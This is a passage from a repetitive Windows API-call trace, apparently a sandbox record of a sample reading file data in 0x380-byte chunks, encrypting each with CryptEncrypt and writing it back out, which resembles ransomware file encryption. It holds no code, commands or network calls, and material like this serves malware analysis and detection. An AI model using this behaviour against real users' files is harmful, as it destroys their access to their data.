lpOverlapped=0x0) returned 1 [0264.644] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.644] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.644] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.644] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.644] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.644] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.644] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.644] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.644] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.644] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.644] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.645] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.645] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.645] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.645] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.645] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.645] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.645] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.645] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.645] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.645] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.645] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.645] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.645] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.645] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.645] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.645] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.646] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.646] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.646] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.646] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.646] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.646] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.646] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.646] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.646] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.646] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.646] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.646] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.646] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.646] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.646] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.646] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.646] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.646] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.646] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.646] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.646] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.647] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.647] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.647] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.647] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.647] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.647] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.647] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.647] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.647] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.647] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.647] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.647] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.647] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.647] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.647] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.647] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.647] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.647] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.647] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.648] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.648] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.648] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.648] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.648] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.648] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.648] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.648] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.648] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.648] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.648] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.648] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.648] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.648] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.648] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.648] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.648] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.648] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.648] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.648] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.649] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.649] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.649] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.649] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.649] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.649] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.649] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.649] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.649] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.649] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.649] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.649] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.649] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.649] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.649] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.649] ReadFile (in: 